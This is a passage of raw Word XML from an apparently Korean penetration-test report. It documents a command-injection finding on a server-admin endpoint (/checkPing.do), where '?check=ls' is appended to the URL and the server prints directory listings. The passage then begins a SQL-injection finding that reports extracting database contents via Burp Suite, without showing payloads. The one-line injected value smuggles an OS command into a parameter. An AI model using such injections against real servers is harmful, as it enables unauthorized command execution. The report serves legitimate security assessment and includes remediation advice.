b0RvYy54bWxQSwECLQAUAAYACAAAACEAHyUEUt4AAAAK&#10;AQAADwAAAAAAAAAAAAAAAAANBQAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAAEAAQA8wAAABgGAAAA&#10;AA==&#10;" filled="f" strokecolor="red" strokeweight="1.5pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="002621B4">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="677A6CE3" wp14:editId="4845B708">
            <wp:extent cx="4571187" cy="1954530"/>
            <wp:effectExtent l="19050" t="19050" r="20320" b="266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981"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4572000" cy="19548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74"/>
      <w:bookmarkEnd w:id="275"/>
    </w:p>
    <w:p w14:paraId="6FD04D4E" w14:textId="070027FD" w:rsidR="00121ED8" w:rsidRDefault="002621B4" w:rsidP="00121ED8">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:bookmarkStart w:id="276" w:name="_Toc206630358"/>
      <w:bookmarkStart w:id="277" w:name="_Toc206630496"/>
      <w:bookmarkStart w:id="278" w:name="_Toc209094580"/>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w:t>
      </w:r>
      <w:r w:rsidR="0041664A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="002621B4">
        <w:t>Burp Suite</w:t>
      </w:r>
      <w:r w:rsidR="00C40C72">
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:r w:rsidRPr="002621B4">
        <w:t>&gt; Intercept on 후, check 파라미터 존재 확인</w:t>
      </w:r>
      <w:bookmarkEnd w:id="276"/>
      <w:bookmarkEnd w:id="277"/>
      <w:bookmarkEnd w:id="278"/>
    </w:p>
    <w:p w14:paraId="234E6881" w14:textId="77777777" w:rsidR="00121ED8" w:rsidRDefault="00121ED8" w:rsidP="00121ED8">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="00FAEB13" w14:textId="08682648" w:rsidR="00121ED8" w:rsidRDefault="00645E26" w:rsidP="00121ED8">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:bookmarkStart w:id="279" w:name="_Toc206630359"/>
      <w:bookmarkStart w:id="280" w:name="_Toc206630497"/>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251419648" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="1E915DEB" wp14:editId="358B9861">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>1965960</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>297815</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1755775" cy="204568"/>
                <wp:effectExtent l="0" t="0" r="15875" b="24130"/>
                <wp:wrapNone/>
                <wp:docPr id="34" name="직사각형 34"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="1755775" cy="2045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2529C" w14:textId="123CDFF7" w:rsidR="00645E26" w:rsidRDefault="00645E26" w:rsidP="00645E26">
                            <w:pPr>
                              <w:jc w:val="center"/>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:hint="eastAsi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5DEB" id="직사각형 34" o:spid="_x0000_s1029" style="position:absolute;left:0;text-align:left;margin-left:154.8pt;margin-top:23.45pt;width:138.25pt;height:16.1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xEvAIAAKYFAAAOAAAAZHJzL2Uyb0RvYy54bWysVEFu2zAQvBfoHwjeG8muFSdC5MBI4KJA&#10;kARNipxpirQEUCRL0pbdW/qHAP1BLz30XUX6hy5JSTHSoIeiPsgkd3aWs9zdk9NtI9CGGVsrWeDR&#10;QYoRk1SVtVwV+OPt4s0RRtYRWRKhJCvwjll8Onv96qTVORurSomSGQQk0uatLnDlnM6TxNKKNcQe&#10;KM0kGLkyDXGwNaukNKQF9kYk4zQ9TFplSm0UZdbC6Xk04lng55xRd8W5ZQ6JAsPdXPia8F36bzI7&#10;IfnKEF3VtLsG+YdbNKSWEHSgOieOoLWp/6BqamqUVdwdUNUkivOasqAB1IzSZ2puKqJZ0ALJsXpI&#10;k/1/tPRyc21QXRb47QQjSRp4o8dv949fvv/8cf/r6wOCY8hRq20O0Bt9bbqdhaUXvOWm8f8gBW1D&#10;XndDXtnWIQqHo2mWTacZRhRs43SSHR550uTJWxvr3jHVIL8osIF3C+kkmwvrIrSH+GBSLWoh4Jzk&#10;QqIWIhynWRo8rBJ16a3eaM1qeSYM2hB4/sUihV8XeA8G1xASbuM1RlVh5XaCxQAfGIcMgY5xjOBr&#10;kw20hFIm3SiaKlKyGC3bD9Z7BM1CAqFn5nDLgbsj6JGRpOeOGejw3pWF0h6cO+l/cx48QmQl3eDc&#10;1FKZl5QJUNVFjvg+STE1Pktuu9zG6vFIf7JU5Q4qyqjYalbTRQ1vekGsuyYGegu6EOaFu4IPFwre&#10;TnUrjCplPr907vFQ8mDFqIVeLbD9tCaGYSTeS2iG49Fk4ps7bCbZdAwbs29Z7lvkujlTUA8jmEya&#10;hqXHO9EvuVHNHYyVuY8KJiIpxC4wdabfnLk4Q2AwUTafBxg0tCbuQt5o6sl9nn3N3m7viNFdYTto&#10;iUvV9zXJn9V3xHpPqeZrp3gdiv8pr90LwDAIpdQNLj9t9vcB9TReZ78BAAD//wMAUEsDBBQABgAI&#10;AAAAIQAfzFX/3wAAAAkBAAAPAAAAZHJzL2Rvd25yZXYueG1sTI/LTsMwEEX3SPyDNUjsqJMAeZFJ&#10;BUgIUbGAtuzdeJpE9SOK3ST8PWYFy9E9uvdMtV60YhONrrcGIV5FwMg0VvamRdjvXm5yYM4LI4Wy&#10;hhC+ycG6vryoRCntbD5p2vqWhRLjSoHQeT+UnLumIy3cyg5kQna0oxY+nGPL5SjmUK4VT6Io5Vr0&#10;Jix0YqDnjprT9qwRPuzpyNVXkmyyp9cke9P53E7viNdXy+MDME+L/4PhVz+oQx2cDvZspGMK4TYq&#10;0oAi3KUFsADc52kM7ICQFTHwuuL/P6h/AAAA//8DAFBLAQItABQABgAIAAAAIQC2gziS/gAAAOEB&#10;AAATAAAAAAAAAAAAAAAAAAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhADj9&#10;If/WAAAAlAEAAAsAAAAAAAAAAAAAAAAALwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhAOxi&#10;PES8AgAApgUAAA4AAAAAAAAAAAAAAAAALgIAAGRycy9lMm9Eb2MueG1sUEsBAi0AFAAGAAgAAAAh&#10;AB/MVf/fAAAACQEAAA8AAAAAAAAAAAAAAAAAFgUAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAABAAE&#10;APMAAAAiBgAAAAA=&#10;" filled="f" strokecolor="red" strokeweight="1.5pt">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="3522529C" w14:textId="123CDFF7" w:rsidR="00645E26" w:rsidRDefault="00645E26" w:rsidP="00645E26">
                      <w:pPr>
                        <w:jc w:val="center"/>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:rFonts w:hint="eastAsia"/>
                        </w:rPr>
                        <w:t>0</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
              </v:rect>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00121ED8">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="789CD020" wp14:editId="47619F59">
            <wp:extent cx="4572000" cy="1315419"/>
            <wp:effectExtent l="19050" t="19050" r="19050" b="1841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615" b="49674"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4572000" cy="13154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79"/>
      <w:bookmarkEnd w:id="280"/>
    </w:p>
    <w:p w14:paraId="5FDD0C9D" w14:textId="0193CE92" w:rsidR="00395654" w:rsidRDefault="00121ED8" w:rsidP="00395654">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:bookmarkStart w:id="281" w:name="_Toc206630360"/>
      <w:bookmarkStart w:id="282" w:name="_Toc206630498"/>
      <w:bookmarkStart w:id="283" w:name="_Toc209094581"/>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w:t>
      </w:r>
      <w:r w:rsidR="0041664A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="00121ED8">
        <w:t>URL 주소 뒤에 “?check=ls” 입</w:t>
      </w:r>
      <w:r w:rsidR="00395654">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>력</w:t>
      </w:r>
      <w:bookmarkEnd w:id="281"/>
      <w:bookmarkEnd w:id="282"/>
      <w:bookmarkEnd w:id="283"/>
    </w:p>
    <w:p w14:paraId="47E490FD" w14:textId="77777777" w:rsidR="00395654" w:rsidRDefault="00395654" w:rsidP="00395654">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7B73FA5A" w14:textId="1F620899" w:rsidR="00395654" w:rsidRDefault="00213410" w:rsidP="00395654">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:bookmarkStart w:id="284" w:name="_Toc206630361"/>
      <w:bookmarkStart w:id="285" w:name="_Toc206630499"/>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251424768" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="0EF091FA" wp14:editId="072AF892">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>3070860</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1075690</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1193800" cy="1339850"/>
                <wp:effectExtent l="0" t="0" r="25400" b="12700"/>
                <wp:wrapNone/>
                <wp:docPr id="35" name="직사각형 35"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="1193800" cy="1339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7E48" id="직사각형 35" o:spid="_x0000_s1026" style="position:absolute;left:0;text-align:left;margin-left:241.8pt;margin-top:84.7pt;width:94pt;height:105.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rCsQIAAJUFAAAOAAAAZHJzL2Uyb0RvYy54bWysVM1uEzEQviPxDpbvdHeTBpqomypqFYRU&#10;tREt6tnx2tmVvB5jO3/cyjsg8QZcOPBcqLwDY+9Po1JxQOSw8XhmvvF883N6tqsV2QjrKtA5zY5S&#10;SoTmUFR6ldMPt/NXJ5Q4z3TBFGiR071w9Gz68sXp1kzEAEpQhbAEQbSbbE1OS+/NJEkcL0XN3BEY&#10;oVEpwdbMo2hXSWHZFtFrlQzS9HWyBVsYC1w4h7cXjZJOI76UgvtrKZ3wROUU3+bj18bvMnyT6Smb&#10;rCwzZcXbZ7B/eEXNKo1Be6gL5hlZ2+oPqLriFhxIf8ShTkDKiouYA2aTpU+yuSmZETEXJMeZnib3&#10;/2D51WZhSVXkdDiiRLMaa/Tw7f7h8/efP+5/ff1C8Bo52ho3QdMbs7Ct5PAYEt5JW4d/TIXsIq/7&#10;nlex84TjZZaNhycp0s9Rlw2H45NRZD55dDfW+bcCahIOObVYuMgn21w6jyHRtDMJ0TTMK6Vi8ZQm&#10;W0Qdp4gZVA5UVQRtFOxqea4s2TCs/3ye4i+kg2gHZigpjZchySatePJ7JQKG0u+FRIowkUETITSn&#10;6GEZ50L7rFGVrBBNtNFhsM4jho6AAVniK3vsFqCzbEA67ObNrX1wFbG3e+c29b859x4xMmjfO9eV&#10;BvtcZgqzaiM39h1JDTWBpSUUe2wgC81kOcPnFVbwkjm/YBZHCauO68Ff40cqwEpBe6KkBPvpuftg&#10;jx2OWkq2OJo5dR/XzApK1DuNvT/Ojo/DLEfhePRmgII91CwPNXpdnwNWP8NFZHg8BnuvuqO0UN/h&#10;FpmFqKhimmPsnHJvO+HcNysD9xAXs1k0w/k1zF/qG8MDeGA1dOjt7o5Z07axxwm4gm6M2eRJNze2&#10;wVPDbO1BVrHVH3lt+cbZj43T7qmwXA7laPW4Tae/AQAA//8DAFBLAwQUAAYACAAAACEAr06kSd8A&#10;AAALAQAADwAAAGRycy9kb3ducmV2LnhtbEyPwU6DQBCG7ya+w2ZMvNmllAAiS6Mmxmh60Kr3LTsF&#10;UnaWsFvAt3c86XHm//LPN+V2sb2YcPSdIwXrVQQCqXamo0bB58fTTQ7CB01G945QwTd62FaXF6Uu&#10;jJvpHad9aASXkC+0gjaEoZDS1y1a7VduQOLs6EarA49jI82oZy63vYyjKJVWd8QXWj3gY4v1aX+2&#10;Ct7c6Sj7rzh+zR6e4+zF5nMz7ZS6vlru70AEXMIfDL/6rA4VOx3cmYwXvYIk36SMcpDeJiCYSLM1&#10;bw4KNnmUgKxK+f+H6gcAAP//AwBQSwECLQAUAAYACAAAACEAtoM4kv4AAADhAQAAEwAAAAAAAAAA&#10;AAAAAAAAAAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQA4/SH/1gAAAJQBAAAL&#10;AAAAAAAAAAAAAAAAAC8BAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQBnWDrCsQIAAJUFAAAO&#10;AAAAAAAAAAAAAAAAAC4CAABkcnMvZTJvRG9jLnhtbFBLAQItABQABgAIAAAAIQCvTqRJ3wAAAAsB&#10;AAAPAAAAAAAAAAAAAAAAAAsFAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAQABADzAAAAFwYAAAAA&#10;" filled="f" strokecolor="red" strokeweight="1.5pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00395654">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6B2772F9" wp14:editId="168EA759">
            <wp:extent cx="4572000" cy="2406112"/>
            <wp:effectExtent l="19050" t="19050" r="19050" b="133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25" b="7955"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4572000" cy="24061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84"/>
      <w:bookmarkEnd w:id="285"/>
    </w:p>
    <w:p w14:paraId="38CF9AB1" w14:textId="1A292D61" w:rsidR="00121ED8" w:rsidRDefault="0079680F" w:rsidP="00395654">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:bookmarkStart w:id="286" w:name="_Toc206630362"/>
      <w:bookmarkStart w:id="287" w:name="_Toc206630500"/>
      <w:bookmarkStart w:id="288" w:name="_Toc209094582"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r w:rsidR="00395654">
        <w:t>그림</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
      <w:r w:rsidR="00395654">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9</w:t>
      </w:r>
      <w:r w:rsidR="0041664A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="0079680F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>서버</w:t>
      </w:r>
      <w:r w:rsidRPr="0079680F">
        <w:t xml:space="preserve"> 관리 페이지에 “ls”를 실행한 결과 출력</w:t>
      </w:r>
      <w:bookmarkEnd w:id="286"/>
      <w:bookmarkEnd w:id="287"/>
      <w:bookmarkEnd w:id="288"/>
    </w:p>
    <w:p w14:paraId="1319357F" w14:textId="77777777" w:rsidR="00395654" w:rsidRDefault="00395654" w:rsidP="00395654">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="10393B53" w14:textId="77777777" w:rsidR="00093139" w:rsidRPr="00CB22A6" w:rsidRDefault="00093139" w:rsidP="00093139">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093139" w:rsidRPr="00B112DB" w14:paraId="55EF54DF" w14:textId="77777777" w:rsidTr="00CB6053">
        <w:trPr>
          <w:trHeight w:val="425"/>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="781" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="double" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7EA59433" w14:textId="77777777" w:rsidR="00093139" w:rsidRPr="00CB22A6" w:rsidRDefault="00093139" w:rsidP="00CB6053">
            <w:pPr>
              <w:pStyle w:val="12"/>
              <w:ind w:leftChars="0" w:left="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:b/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:bookmarkStart w:id="289" w:name="_Hlk206596866"/>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31335972" w14:textId="77777777" w:rsidR="00093139" w:rsidRPr="00CB22A6" w:rsidRDefault="00093139" w:rsidP="00CB6053">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9FB3A11" w14:textId="77777777" w:rsidR="00093139" w:rsidRPr="00CB22A6" w:rsidRDefault="00093139" w:rsidP="00CB6053">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E71A0B" w:rsidRPr="00B112DB" w14:paraId="5FF455E7" w14:textId="77777777" w:rsidTr="00CB60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997DFC7" w14:textId="77777777" w:rsidR="00E71A0B" w:rsidRPr="00CB22A6" w:rsidRDefault="00E71A0B" w:rsidP="00E71A0B">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70BD4B" w14:textId="0017FC79" w:rsidR="00E71A0B" w:rsidRPr="00CB22A6" w:rsidRDefault="00E71A0B" w:rsidP="00E71A0B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>서버 관리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A1AC495" w14:textId="6D8C6077" w:rsidR="00E71A0B" w:rsidRPr="00CB22A6" w:rsidRDefault="00E71A0B" w:rsidP="00E71A0B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00225909">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>c</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>heckPing</w:t>
            </w:r>
            <w:r w:rsidRPr="00225909">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>.do</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:bookmarkEnd w:id="289"/>
    </w:tbl>
    <w:p w14:paraId="30CCB3D0" w14:textId="77777777" w:rsidR="00093139" w:rsidRDefault="00093139" w:rsidP="009F2F81">
      <w:pPr>
        <w:pStyle w:val="aa"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="381B0057" w14:textId="77777777" w:rsidR="00093139" w:rsidRPr="00CB22A6" w:rsidRDefault="00093139" w:rsidP="00093139">
      <w:pPr>
        <w:pStyle w:val="Level4TitleCtl4"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CB22A6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>해결방안</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EE8D1E8" w14:textId="770C6256" w:rsidR="00093139" w:rsidRPr="0060738E" w:rsidRDefault="0060738E" w:rsidP="00093139">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0060738E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>외부</w:t>
      </w:r>
      <w:r w:rsidRPr="0060738E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 입력을 통해 운영체제 명령이 실행되지 않도록 입력값 검증 및 서버 측 명령어 실행 제한이 필요합니다. 또한</w:t>
      </w:r>
      <w:r w:rsidR="0020627B">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="0060738E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 애플리케이션은 운영체제로부터 명령어를 직접적으로 호출하지 않도록 구현하는 것이 좋습니다.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07ED46AA" w14:textId="4590EC3D" w:rsidR="00995BFE" w:rsidRDefault="00995BFE">
      <w:pPr>
        <w:widowControl/>
        <w:wordWrap/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:snapToGrid/>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="48792726" w14:textId="51B7039E" w:rsidR="00995BFE" w:rsidRDefault="00995BFE" w:rsidP="00995BFE">
      <w:pPr>
        <w:pStyle w:val="Level3TitleCtl3"/>
      </w:pPr>
      <w:bookmarkStart w:id="290" w:name="_Toc206601966"/>
      <w:bookmarkStart w:id="291" w:name="_Toc209094555"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>S</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">QL </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>인젝션</w:t>
      </w:r>
      <w:bookmarkEnd w:id="290"/>
      <w:bookmarkEnd w:id="291"/>
    </w:p>
    <w:p w14:paraId="6ADFAD20" w14:textId="5417C5FE" w:rsidR="00995BFE" w:rsidRDefault="00995BFE" w:rsidP="00995BFE">
      <w:pPr>
        <w:pStyle w:val="Level4TitleCtl4"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>개요</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F138A79" w14:textId="508FA9A1" w:rsidR="00995BFE" w:rsidRDefault="00995BFE" w:rsidP="00995BFE">
      <w:pPr>
        <w:pStyle w:val="aa"/>
      </w:pPr>
      <w:r w:rsidRPr="00995BFE">
        <w:t>사용자 입력값을 제대로 검증하지 않고 데이터베이스와 연동된 SQL 쿼리에 직접 포함</w:t>
      </w:r>
      <w:r w:rsidR="009866BB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>할</w:t>
      </w:r>
      <w:r w:rsidRPr="00995BFE">
        <w:t xml:space="preserve"> 때, 공격자가 쿼리문에 악의적인 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>구문을</w:t>
      </w:r>
      <w:r w:rsidRPr="00995BFE">
        <w:t xml:space="preserve"> 삽입하여 데이터베이스의 정보 열람, 조작, 삭제, 계정 탈취 등 다양한 공격을 가능하게 하는</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 취약점입니다.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19139661" w14:textId="77777777" w:rsidR="00BF603D" w:rsidRDefault="00BF603D" w:rsidP="00995BFE">
      <w:pPr>
        <w:pStyle w:val="aa"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="327F3D63" w14:textId="77777777" w:rsidR="00995BFE" w:rsidRPr="00CB22A6" w:rsidRDefault="00995BFE" w:rsidP="00995BFE">
      <w:pPr>
        <w:pStyle w:val="Level4TitleCtl4"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>문제점</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2710606F" w14:textId="1053224B" w:rsidR="00995BFE" w:rsidRDefault="00C0796F" w:rsidP="00C0796F">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C0796F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">SQL 문을 통한 데이터베이스 정보 탈취가 가능한 취약점이 발견되었습니다. Burp Suite를 활용하여 데이터베이스명, 테이블 목록, 특정 테이블의 </w:t>
      </w:r>
      <w:r w:rsidR="00FA379C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>칼</w:t>
      </w:r>
      <w:r w:rsidRPr="00C0796F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
        </w:rPr>
        <w:t>럼 및 데이터까지 추출할 수 있음을 확인했습니다. 이는 공격자가 비정상적인 SQL 쿼리를 주입하여 DBMS 및 데이터 열람·조작을 수행할 수 있는 위험이 있습니다.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60574793" w14:textId="77777777" w:rsidR="00B96FB0" w:rsidRDefault="00B96FB0" w:rsidP="00C0796F">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="04FE77BE" w14:textId="4CAB2728" w:rsidR="0079680F" w:rsidRPr="00C0796F" w:rsidRDefault="0079680F" w:rsidP="0079680F">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
